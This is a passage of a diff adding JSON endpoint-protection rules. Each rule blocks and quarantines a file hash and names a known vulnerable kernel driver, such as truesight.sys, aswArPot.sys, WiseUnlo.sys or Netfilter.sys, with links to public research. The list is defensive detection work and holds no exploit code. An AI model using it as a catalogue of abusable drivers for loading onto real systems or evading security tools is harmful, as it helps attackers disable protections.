+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982836Z",
+ "creation_date": "2026-03-23T11:45:29.982838Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982843Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "358ac54be252673841a1d65bfc2fb6d549c1a4c877fa7f5e1bfa188f30375d69",
+ "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5fd41a6c-ea33-5f24-a582-91dd75cb4d70",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620583Z",
+ "creation_date": "2026-03-23T11:45:29.620585Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620590Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ab41816abbf14d59e75b7fad49e2cb1c1feb27a3cb27402297a2a4793ff9da7",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5fe8dc0f-9e92-513d-bf3e-d39153e5ebd1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606523Z",
+ "creation_date": "2026-03-23T11:45:29.606525Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606530Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b3316496ab1e2d1ef02be966d9caa171674856e8fb8ea78d6a3bcfe8e2013c1",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5ffa9f62-fbf7-5ef5-b8b5-df5b43aa16a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969966Z",
+ "creation_date": "2026-03-23T11:45:29.969968Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969973Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e27fa56ceff3fe7d5a723c5f4192ce6aa16994f88cf05935645f9e398292376a",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6001705e-4220-5a9d-87c8-c940b75a2728",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828405Z",
+ "creation_date": "2026-03-23T11:45:31.828407Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828413Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae986d6d28875a3f0ded62b1bea8b09420964eadda0f84aaae883e40ef392fd0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "60048928-7e6a-52a4-8486-d55184a0048b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975220Z",
+ "creation_date": "2026-03-23T11:45:29.975222Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975227Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "35b31c96194d78cbb98b3223bf810f78f53fc0e4601f49169938ca883586e4e9",
+ "comment": "Vulnerable Kernel Driver (aka HpPortIox64.sys) [https://www.loldrivers.io/drivers/13637210-2e1c-45a4-9f76-fe38c3c34264/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "60086cd4-7cde-51d8-8461-b95a5f620ceb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491089Z",
+ "creation_date": "2026-03-23T11:45:31.491092Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491101Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "66ead034234c85988239b0c0bf96d68bb56366cd85c6695e7c586f2c5823842c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "600c166f-e365-55ce-b204-4a4d3a689e09",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151246Z",
+ "creation_date": "2026-03-23T11:45:31.151248Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151254Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a28f047f3fdd96e3a917dc99e106ae9fd4fd96b5671d9fa43b752e1ae7e5100e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "601e47b5-689d-5e7f-9cb7-c554a7d31d68",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977881Z",
+ "creation_date": "2026-03-23T11:45:29.977883Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977889Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c67c6f1e03a466dc660bcad6051fc38eb6e9004a4e252abe52c6155f5768ad90",
+ "comment": "Vulnerable Kernel Driver (aka driver7-x86.sys) [https://www.loldrivers.io/drivers/670dc258-78b5-4552-a16b-b41917c86f8d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6037a93e-6a54-5951-a11a-a1c3160df731",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493115Z",
+ "creation_date": "2026-03-23T11:45:31.493119Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493127Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e62b11cb14eca6a3c9ceb6f3f5741149742896f7dbb4b3407aa82e3412a34b3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "60402990-c588-5a24-9145-6e98acbb5dc4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967784Z",
+ "creation_date": "2026-03-23T11:45:29.967789Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967805Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c56536f99207915e5a1f7d4f014ab942bd820e64ff7f371ad0462ef26ed27242",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "604175a8-026a-5913-82ce-e543b717b4d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477355Z",
+ "creation_date": "2026-03-23T11:45:31.477358Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477368Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7b51ba453918a897d18315213c105381151953edfec0850e9b01f66b2467d7b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6046e592-5933-587f-925d-bcf81eb61275",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159385Z",
+ "creation_date": "2026-03-23T11:45:31.159387Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159393Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd80868d5010f97bd3426ff87326cfd01939e0c45fd3b27eb5a2028311ab1b1d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "604a9c8b-ed6e-5a36-8cfc-5cf1859f7fe3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823663Z",
+ "creation_date": "2026-03-23T11:45:30.823665Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823671Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b37cb203f790c11c291988871e3cfe34fe35cfa684c7c55b78934790f83d51c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "604d9045-d619-559c-9b8c-d5c4bc10cbbb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620658Z",
+ "creation_date": "2026-03-23T11:45:29.620660Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620665Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7f190f6e5ab0edafd63391506c2360230af4c2d56c45fc8996a168a1fc12d457",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6056d1ba-dbd8-5e72-bcfd-52dd4a9a2d00",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825041Z",
+ "creation_date": "2026-03-23T11:45:30.825045Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825055Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c3988a428a3439452164edbf1abff6fabf257c97ab693f5a5c8149fc2fc17ca3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "60578438-f2cb-5103-ad69-a8b2c9b13452",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476629Z",
+ "creation_date": "2026-03-23T11:45:31.476632Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476642Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7cdda07837e62957e20d91d97c82c5ce11b3f35aa6b7ec482841628e2c81b46",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "605b193d-03a4-519c-bf0b-bf171a2dbab7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500336Z",
+ "creation_date": "2026-03-23T11:45:31.500339Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500347Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "453e715f79a5c8b9c8222232b665a2cc60ab054a64685d402cd414ce7255eb65",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6070e473-0150-5486-86d8-8d5143e1ed35",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820900Z",
+ "creation_date": "2026-03-23T11:45:31.820904Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820913Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f29ddd1da190e2000fe5d42a032650dbe36bf1c7df9efb06159387a794e766b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "607a6150-2cb2-5678-a559-ddcd385c3926",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831602Z",
+ "creation_date": "2026-03-23T11:45:30.831605Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831610Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "51857e19f774845e9ff4b463a42088bfd5a7c096fe1d3b677de4adc3e78cb239",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "60856f1e-4e2e-5c78-bc77-6783b043bcaf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475532Z",
+ "creation_date": "2026-03-23T11:45:30.475536Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475545Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "983310cdce8397c016bfcfcc9c3a8abbb5c928b235bc3c3ae3a3cc10ef24dfbd",
+ "comment": "Vulnerable Kernel Driver (aka vboxguest.sys) [https://www.loldrivers.io/drivers/0baa833c-e4e1-449e-86ee-cafeb11f5fd5/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "608e9852-4e22-5b79-b265-4bea6a7bc908",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826300Z",
+ "creation_date": "2026-03-23T11:45:30.826302Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826308Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26f3439efa59eed34ebfd691aa51526ac299dbefb0a5504263e461aca531ac03",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6091bafa-edfb-5d9c-8a1d-83b564dc4387",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826277Z",
